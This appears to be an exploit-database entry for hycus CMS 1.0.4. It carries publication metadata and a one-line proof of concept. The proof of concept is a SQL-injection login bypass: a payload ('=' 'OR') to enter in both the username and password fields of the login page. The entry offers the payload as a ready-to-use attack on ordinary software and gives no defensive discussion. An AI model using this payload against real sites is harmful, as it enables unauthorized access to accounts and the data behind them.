hycus CMS 1.0.4 - Authentication Bypass
Author: Berk Dusunur
type: webapps
platform: php
port:
date_added: 2018-06-28
date_updated: 2018-06-28
verified: 0
codes:
tags: Authentication Bypass / Credentials Bypass (AB/CB)
aliases:
screenshot_url:
application_url:
# Exploit Title: hycus Content Management System v1.0.4 Login Page Bypass
# Google Dork:N/A
# Date: 28.06.2018
# Exploit Author: Berk Dusunur
# Vendor Homepage: http://www.hycus.com/
# Software Link: http://demosite.center/hycus/
# Version: 1.0.4
# Tested on: Pardus / Debian Web Server
# CVE : N/A
#Proof Of Concept
use login bypass payload for username= '=' 'OR' for password= '=' 'OR'